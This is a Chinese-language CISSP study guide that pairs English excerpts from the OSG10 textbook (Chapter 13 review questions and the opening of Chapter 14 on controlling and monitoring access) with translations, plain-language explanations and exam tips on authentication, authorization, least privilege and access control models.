10. Users log on with a username when accessing the company network from home. Management wants to implement a second factor of authentication for these users. They want a secure solution, but they also want to limit costs. Which of the following best meets these requirements? A. Short Message Service (SMS) B. Fingerprint scans C. Authenticator app D. Personal identification number (PIN) 11. Which of the following provides authentication based on a physical characteristic of a subject? A. Account ID B. Biometrics C. Authenticator D. PIN 12. Fingerprint readers match minutiae from a fingerprint to data in a database. Which of the following accurately identify fingerprint minutiae?

(Choose three.) A. Vein pattern B. Ridges C. Bifurcations D. Whorls 13. An organization wants to implement biometrics for authentication, but management doesn't want to use fingerprints. Which of the following is the most likely reason why management doesn't want to use fingerprints? A. Fingerprints can be counterfeited. B. Fingerprints can be changed. C. Fingerprints aren't always available. D. Registration takes too long. 10.

中文直译 / 整理

用户从家中访问公司网络时使用用户名登录。 管理层希望为这些用户实施 第二种身份验证方式。 他们希望采用安全的解决方案,同时控制成本。 以下哪 一项最符合这些要求? A. 短信服务(SMS) B. 指纹扫描 C. 认证应用 D. 个人识别码(PIN) 11. 以下哪一项基于主体的物理特征提供身份验证? A. 账户ID B. 生物特征 C. 认证器 D. 密码 12. 指纹读取器将指纹的细节特征与数据库中的数据进行匹配。 以下哪 几项准确地标识了指纹细节特征? (选择三项。 ) A. 静脉模式 B. 山脊 C. 分叉 D. 螺纹 13. 一个组织希望实施生物识别技术进行身份验证,但管理层不希望使用指 纹。 以下哪项最可能是管理层不希望使用指纹的原因? A. 指纹可以被伪造。 B. 指纹可以被更改。 C. 指纹并不总是可用。 D. 注册耗时过长。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 50 / PDF P966

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

14. Which of the following items are required to ensure logs accurately support accountability? (Choose two.) A. Identification B. Authorization C. Auditing D. Authentication 15. A company is installing several Linux servers in the server room. These are the first Linux servers for the company, so they hired an administrator with Linux experience to manage them and train other administrators on Linux. How should the company assign privileges for the new administrator? A. Add the administrator to the Administrators group. B. Add the administrator to the sudo group. C. Give the administrator the sudo password. D. Define a new role for Linux administrators. 16.

A company's security policy states that user accounts should be disabled during the exit interview for any employee leaving the company. Which of the following is the most likely reason for this policy? A. To remove the account B. To remove privileges assigned to the account C. To prevent sabotage D. To encrypt user data 17. When an employee leaves the organization under normal circumstances, what is the most appropriate action to take at the conclusion of their final day of work? A. Delete their account. B. Force them to change their password. C. Disable their account. D. Take no action for at least 7 days. 18.

Karen is taking maternity leave and will be away from the job for at least 12 weeks. Which of the following actions should be taken while she is 14.

中文直译 / 整理

以下哪些项是确保日志准确所必需的 支持问责制? (选择两项。 ) A. 身份识别 B. 授权 C. 审计 D. 身份验证 15. 一家公司正在服务器机房中安装多台Linux服务器。 这些是该公司首次 部署的Linux服务器,因此他们聘请了一位具有Linux经验的管理员来管理 它们,并培训其他管理员使用Linux。 公司应如何为这位新管理员分配权限? A. 将管理员添加到管理员组。 B. 将管理员添加到 sudo 组。 C. 向管理员提供 sudo 密码。 D. 为 Linux 管理员定义一个新角色。 16. 公司的安全策略规定,任何离职员工在离职面谈期间应禁用其用户账户。 以下哪项最可能是该策略的原因? A. 删除账户 B. 撤销分配给该账户的权限 C. 防止破坏行为 D. 加密用户数据 17. 当员工在正常情况下离开组织时,在其最后工作日结束时应采取的最恰当 措施是什么? A. 删除其账户。 B. 强制其更改密码。 C. 禁用其账户。 D. 至少7天内不采取任何措施。 18. 卡伦正在休产假,将离开工作岗位至少12周。 在她休假期间,应采取以下哪项 措施?

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

问责性:问责性要求能把行为绑定到具体主体。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

问责依赖识别、认证、授权、审计和记账共同工作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
问责性 问责性要求能把行为绑定到具体主体。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
身份 身份是主体在系统中的标识。
学习单元 51 / PDF P967

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

taking this leave of absence? A. Delete the account. B. Reset the account's password. C. Do nothing. D. Disable the account. 19. Security investigators discovered that after attackers exploited a Microsoft SQL (database) server, they identified the password for the sa account. They then used this to access other servers on the network. What can be implemented to prevent this from happening in the future? A. Account deprovisioning B. Disabling an account C. Account access review D. Account revocation 20. Fred, an administrator, has been working within an organization for over 10 years. He previously maintained database servers while working in a different division.

He now works in the programming department but still retains privileges on the database servers. He recently modified a setting on a database server so that a script he wrote will run. Unfortunately, his change disabled the server for several hours before database administrators discovered the change and reversed it. Which of the following could have prevented this outage? A. A policy requiring strong authentication B. Multifactor authentication C. Logging D. Account access review

中文直译 / 整理

休此假? A. 删除账户。 B. 重置账户密码。 C. 不采取任何操作。 D. 禁用账户。 19. 安全调查人员发现,攻击者在利用 Microsoft SQL(数据库)服务器后, 识别出了 sa 账户的密码,并使用该密码访问了网络上的其他服务器。 为防止 此类事件再次发生,可以实施什么措施? A. 账户停用 B. 禁用账户 C. 账户访问审查 D. 撤销账户 20. 弗雷德是一名管理员,在该组织工作已超过10年。 他此前在另一个部门负 责维护数据库服务器。 现在他在编程部门工作,但仍保留对数据库服务器的权 限。 他最近修改了数据库服务器上的一个设置,以便运行他编写的脚本。 不幸 的是,他的更改导致服务器停机数小时,直到数据库管理员发现并恢复了该更 改。 以下哪项措施本可以防止此次中断? A. 要求使用强身份验证的策略 B. 多因素身份验证 C. 日志记录 D. 账户访问审查

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
第 14 章 · P968-1027 · 60 个学习单元

控制和监控访问

OSG10 · Chapter 14 · Controlling and Monitoring Access · 全文覆盖 + 小白精读 + 画报

第 14 章:控制和监控访问

这不是提炼版。本页按 PDF 第 968-1027 页连续覆盖第 14 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

60个连续学习单元
4格原文 / 直译 / 解释 / 考点
60页覆盖第14章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P968

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

Chapter 14 Controlling and Monitoring Access THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 3.0: Security Architecture and Engineering 3.7 Understand methods of cryptanalytic attacks 3.7.11 Pass the hash 3.7.12 Kerberos exploitation Domain 5.0: Identity and Access Management (IAM) 5.4 Implement and manage authorization mechanisms 5.4.1 Role-based access control (RBAC) 5.4.2 Rule based access control 5.4.3 Mandatory access control (MAC) 5.4.4 Discretionary access control (DAC) 5.4.5 Attribute-based access control (ABAC) 5.4.6 Risk based access control 5.4.7 Access policy enforcement (e.g., policy decision point, policy enforcement point) 5.5 Manage the identity and access provisioning lifecycle 5.5.4 Privilege escalation (e.g., use of sudo, auditing its use) 5.6 Implement authentication systems Chapter 13, “Managing Identity and Authentication,” presented several important topics related to the Identity and Access Management (IAM) domain.

This chapter builds on those topics and includes key information on common access control models. It also provides information on how to prevent or mitigate access control attacks. Be sure to read and study the

中文直译 / 整理

第14章 控制和监控访问 本章涵盖的CISSP主题包括: 领域3.0:安全架构与工程 3.7 理解密码分析攻击的方法 3.7.11 哈希传递 3.7.12 Kerberos 利用 域 5.0:身份和访问管理 (IAM) 5.4 实施和管理授权机制 5.4.1 基于角色的访问控制 (RBAC) 5.4.2 基于规则的访问控制 5.4.3 强制访问控制 (MAC) 5.4.4 自主访问控制(DAC) 5.4.5 基于属性的访问控制(ABAC) 5.4.6 基于风险的访问控制 5.4.7 访问策略执行(例如,策略决策点、策略执行点) 5.5 管理身份和访问配置生命周期 5.5.4 权限提升(例如,使用 sudo 及其使用审计) 5.6 实现身份验证系统 第13章,“身份和认证管理”介绍了与身份和访问管理(IAM)领域相关的若 干重要主题。 本章在此基础上进一步介绍了常见访问控制模型的关键信息,并 提供了如何预防或缓解访问控制攻击的说明。 请务必阅读并学习

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

Policy 高层、强制、稳定;Procedure 具体步骤。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
政策 政策是高层原则,说明必须遵守什么。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
身份 身份是主体在系统中的标识。
基于角色的访问控制 RBAC RBAC 按角色分配权限,适合岗位清晰的组织。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 02 / PDF P969

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

materials from each of these chapters to ensure complete coverage of this domain's essential material. Comparing Access Control Models Chapter 13 focused heavily on identification and authentication. After authenticating subjects, the next step is authorization. The method of authorizing subjects to access objects varies depending on the IT system's access control method. A subject is an active entity that accesses a passive object, and an object is a passive entity that provides information to active subjects. For example, when a user accesses a file, the user is the subject and the file is the object.

Comparing Permissions, Rights, and Privileges When studying access control topics, you'll often come across the terms permissions, rights, and privileges. Some people use these terms interchangeably, but they don't always mean the same thing. Permissions In general, permissions refer to the access granted for an object and determine what you can do with it. You can grant a user permission to read, write, delete, and/or execute a file on a file server. If you have read permission for a file, you'll be able to open it and read it. You may be granted read and execute permissions for an application file, which gives you permission to run the application.

Additionally, you may be granted permissions within a database, allowing you to retrieve or update information in the database. Rights A right primarily refers to the ability to take an action on an object. For example, a user might have the right to modify the system time on a computer or the right to restore backed-up data. This is a subtle distinction and not always stressed. Privileges A privilege is a combination of elevated rights and permissions. For example, an administrator for a computer will have full privileges, granting the administrator full rights and permissions on the computer. The

中文直译 / 整理

从这些章节中提取材料,以确保全面覆盖本领域的核心内容。 比较访问控制模型 第13章主要侧重于身份识别和身份验证。 在对主体进行身份验证后,下一 步是授权。 根据IT系统的访问控制方法,授权主体访问对象的方式会有所 不同。 主体是一个主动实体,用于访问被动对象,而对象是一个被动实体, 为活跃的主体提供信息。 例如,当用户访问文件时,用户是主体,文件是 对象。 比较权限、权利和特权 在学习访问控制相关主题时,您经常会遇到权限、权利和特权这些术 语。 有些人会互换使用这些术语,但它们并不总是意味着相同的内容。 权限 一般来说,权限是指对某个对象所授予的访问权限,决定了您可以对其执行 的操作。 您可以授予用户对文件服务器上的文件进行读取、写入、删除和/或执行 的权限。 如果您对某个文件具有读取权限,您就可以打开并阅读该文件。 您可能 被授予对应用程序文件的读取和执行权限,从而允许您运行该应用程序。 此外, 您还可能被授予数据库内的权限,允许您检索或更新数据库中的信息。 权利 权利主要指对某个对象执行操作的能力。 例如,用户可能具有修改计算机 系统时间的权利,或恢复备份数据的权利。 这是一个细微的差别,通常并不总 是被强调。

权限 权限是提升的权利和许可的组合。 例如,计算机的管理员将拥有完整权限, 授予管理员在计算机上的完整权利和许可。 该

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
学习单元 03 / PDF P970

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

administrator will be able to perform any actions and access any data on the computer. Understanding Authorization Mechanisms Access control models use many different types of authorization mechanisms, or methods to control who can access specific objects. Here's a brief introduction to some common mechanisms and concepts: Implicit Deny A fundamental principle of access control is implicit deny, and most authorization mechanisms use it. The implicit deny principle ensures that access to an object is denied unless access has been explicitly granted to a subject.

For example, imagine an administrator explicitly grants Jeff Full Control permissions to a file but does not explicitly grant permissions to anyone else. Mary doesn't have any access even though the administrator didn't explicitly deny her access. Instead, the implicit deny principle denies access to Mary and everyone else except for Jeff. You can also think of this as deny by default. Access Control Matrix Chapter 8, “Principles of Security Models, Design, and Capabilities,” covers access control lists and access control matrixes in more detail. In short, an access control matrix is a centralized table that includes subjects, objects, and assigned permissions, rights, and privileges.

When a subject attempts an action, the system checks the access control matrix to determine if the subject has the appropriate privileges to perform the action. For example, an access control matrix can include a set of files as the objects and a set of users as the subjects. It will show the exact permissions authorized for each user for each file. Note that this covers much more than a single access control list (ACL). In this example, each file listed within the matrix has a separate ACL that lists the authorized users and their assigned permissions.

Capability List Capability lists are a decentralized, distributed method of identifying permissions, rights, and privileges assigned to subjects using tokens or keys. They are different from ACLs in that a capability list is focused on individual subjects (a user or a process). A capability for a user would list the user and its various access permissions, rights, and privileges to individual objects. In contrast, ACLs are focused on individual objects. An ACL for a file would list all the users and/or groups that have authorized access to the file and the specific access granted to each.

中文直译 / 整理

管理员能够执行任何操作并访问计算机上的任何数据。 理解授权机制 访问控制模型使用多种不同的授权机制,即控制谁可以访问特定对象的方法。 以下是几种常见机制和概念的简要介绍: 隐式拒绝访问控制的一项基本原理是隐式拒绝,大多数授权机制都采用这一原 则。 隐式拒绝原则确保,除非明确授予主体对某个对象的访问权限,否则一律 拒绝访问。 例如,假设管理员明确授予杰夫对某个文件的完全控制权限,但未 明确授予其他任何人任何权限。 玛丽即使未被管理员明确拒绝访问,也没有任 何访问权限。 这是因为隐式拒绝原则会拒绝玛丽以及其他所有人的访问,仅允 许杰夫访问。 你也可以将此理解为“默认拒绝”。 访问控制矩阵 第8章“安全模型、设计与能力的原则”访问控制矩阵是一个集 中式表格,包含主体、对象以及分配的权限、权利和特权。 当主体尝试执行某项 操作时,系统会检查访问控制矩阵,以确定该主体是否具有执行该操作的适当权 限。 例如,访问控制矩阵可以将一组文件作为对象,一组用户作为主体,并显示 每个用户对每个文件的精确授权权限。 请注意,这涵盖的内容远不止单个访问控 制列表(ACL)。

在此示例中,矩阵中列出的每个文件都有一个独立的ACL,列 出了授权用户及其分配的权限。 功能列表功能列表是一种去中心化、分布式的机制,用于使用令牌或密钥标识 分配给主体的权限、权利和特权。 它们与ACL不同,因为能力列表关注的是 单个主体(用户或进程)。 一个用户的能力列表会列出该用户及其对各个对象 的访问权限、权利和特权。 相比之下,ACL关注的是单个对象。 一个文件的 ACL会列出所有被授权访问该文件的用户和/或组,以及授予每个用户的特定 访问权限。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
学习单元 04 / PDF P971

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

The difference between an ACL and a capability list is the focus. ACLs are object-focused and identify access granted to subjects for any specific object. Capability lists are subject-focused and identify the objects that subjects can access. Constrained Interface Applications use constrained interfaces or restricted interfaces to restrict what users can do or see based on their privileges. Users with full privileges have access to all the capabilities of the application. Users with restricted privileges have limited access. Applications constrain the interface using different methods. A common method is to hide the capability if the user doesn't have permission to use it.

For example, commands might be available to administrators via a menu or by rightclicking an item, but if a regular user doesn't have permissions, the command does not appear. Other times, the application displays the menu item but shows it dimmed or disabled. A regular user can see the menu item but will not be able to use it. The Clark–Wilson model (covered in Chapter 8) discusses the technical details of how it implements a constrained interface. Content-Dependent Control Content-dependent access controls restrict access to data based on the content within an object. A database view is a content-dependent control.

A view dynamically retrieves specific columns from one or more tables, creating a virtual table. For example, a customer table in a database could include customer names, email addresses, phone numbers, and credit card data. A customer-based view might show only the customer names and email addresses and nothing else. Users granted access to the view can see the customer names and email addresses but cannot access data in the underlying table. Context-Dependent Control Context-dependent access controls require specific activity before granting users access. As an example, consider the data flow for a transaction selling digital products online.

Users add products to a shopping cart and begin the checkout process. The first page in the checkout flow shows the products in the shopping cart, the next page collects credit card data, and the last page confirms the purchase and provides instructions for downloading the digital products. The system denies access to the download page if users don't go through the purchase process first. It's also possible to use date and time controls as context-dependent controls. For example, it's possible to restrict access to computers and applications based ACL

中文直译 / 整理

与能力列表之间的区别在于关注点。 ACL以对象为中心,标识对特 定对象授予主体的访问权限; 能力列表以主体为中心,标识主体可以访问的 对象。 受限接口 应用程序使用 受限接口 或受限接口来根据用户的权限限制用户可以 执行或查看的内容。 拥有完整权限的用户可以访问应用程序的所有功能。 拥有 受限权限的用户则只能访问有限的功能。 应用程序通过不同方法来约束接口。 一种常见方法是当用户没有使用某项功能的权限时,隐藏该功能。 例如,管理 员可以通过菜单或右键单击项目来使用某些命令,但如果普通用户没有相应权 限,该命令将不会显示。 有时,应用程序会显示菜单项,但将其显示为灰色或 禁用状态。 普通用户可以看到菜单项,但无法使用它。 Clark–Wilson 模型 (见 第 8 章)讨论了其如何实现受限接口的技术细节。 内容相关控制 内容相关访问控制 根据对象内的内容限制对数据的访问。 数据库 视图是一种内容相关控制。 视图动态地从一个或多个表中检索特定列,创建一个 虚拟表。 例如,数据库中的客户表可能包含客户姓名、电子邮件地址、电话号码 和信用卡数据。 基于客户的视图可能仅显示客户姓名和电子邮件地址,而不显示 其他内容。

被授予视图访问权限的用户可以查看客户姓名和电子邮件地址,但无 法访问底层表中的数据。 上下文相关控制 上下文相关访问控制 在授予用户访问权限前需要特定的活动。 例如,考虑在线销售数字产品的交易数据流。 用户将产品添加到购物车并开始结 账流程。 结账流程的第一页显示购物车中的产品,下一页收集信用卡信息,最后 一页确认购买并提供下载数字产品的说明。 如果用户未先完成购买流程,系统将 拒绝其访问下载页面。 还可以将日期和时间控制用作上下文相关控制。 例如,可 以根据

小白解释

场景先行:你是公司的安全负责人,正在读第 971 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
学习单元 05 / PDF P972

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

on the current day and/or time within a time zone. If users attempt to access the resource outside the allowed time, the system denies them access. Need to Know This principle ensures that subjects are granted access only to what they need to know for their work tasks and job functions. Subjects may have clearance to access classified or restricted data but are not granted authorization to the data unless they actually need it to perform a job. Least Privilege The principle of least privilege ensures that subjects are granted only the privileges they need to perform their work tasks and job functions. This is sometimes lumped together with need to know.

The only difference is that least privilege will also include rights to take action on a system. Separation of Duties and Responsibilities The separation of duties and responsibilities principle ensures that sensitive functions are split into tasks performed by two or more employees. It helps prevent fraud and errors by creating a system of checks and balances. Chapter 16, “Managing Security Operations,” covers several related access control topics in more depth. These include need to know, least privilege, and separation of duties. Defining Requirements with a Security Policy A security policy is a document that defines the security requirements for an organization.

It identifies assets that need protection and the extent to which security solutions should go to protect them. Some organizations create a security policy as a single document, and other organizations create multiple security policies, with each one focused on a separate area. Policies are an important element of access control because they help personnel within the organization understand what security requirements are important. Senior leadership approves the security policy and, in doing so, provides a broad overview of an organization's security needs. However, a security policy usually does not go into details about how to fulfill the security needs or how to implement the policy.

For example, it may state the need to implement and enforce separation of duties and least privilege principles but not state how to do so. Professionals within the organization use the security policies as a guide to implement security requirements.

中文直译 / 整理

时区内的当前日期和/或时间限制对计算机和应用程序的访问。 如果用户在允许的 时间之外尝试访问资源,系统将拒绝其访问。 需要知道 这一原则确保主体仅被授予执行其工作任务和职责所需的需要知道的信 息。 主体可能具有访问机密或受限数据的权限,但除非其确实需要这些数据来完 成工作,否则不会被授权访问这些数据。 最小权限 最小权限原则 确保主体仅被授予执行其工作任务和职责所需的权限。 这一原则有时与需要知道原则合并使用。 唯一的区别是,最小权限还包含对系 统执行操作的权利。 职责与权限分离 职责与权限分离 原则确保敏感职能被拆分为由两名或多名员工 分别执行的任务。 它通过建立制衡机制来防止欺诈和错误。 第16章“管理安全运营” 更深入地探讨了几个相关的访问控制主题,包括需要 知道、最小权限和职责分离。 通过安全策略定义需求 安全策略 是一份定义组织安全需求的文档。 它识别需要保护的资产,以及安全 解决方案应如何程度地保护这些资产。 一些组织将安全策略创建为单一文档, 而其他组织则创建多个安全策略,每个策略专注于一个独立领域。 策略是访问控制的重要组成部分,因为它们有助于组织内部人员了解哪些安全 要求至关重要。

高级管理层批准安全策略,从而提供组织安全需求的总体概览。 然而,安全策略通常不会详细说明如何满足安全需求或如何实施策略。 例如, 它可能指出需要实施和强制执行职责分离和最小权限原则,但不会说明具体如 何操作。 组织内的专业人员将安全策略作为实施安全要求的指南。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

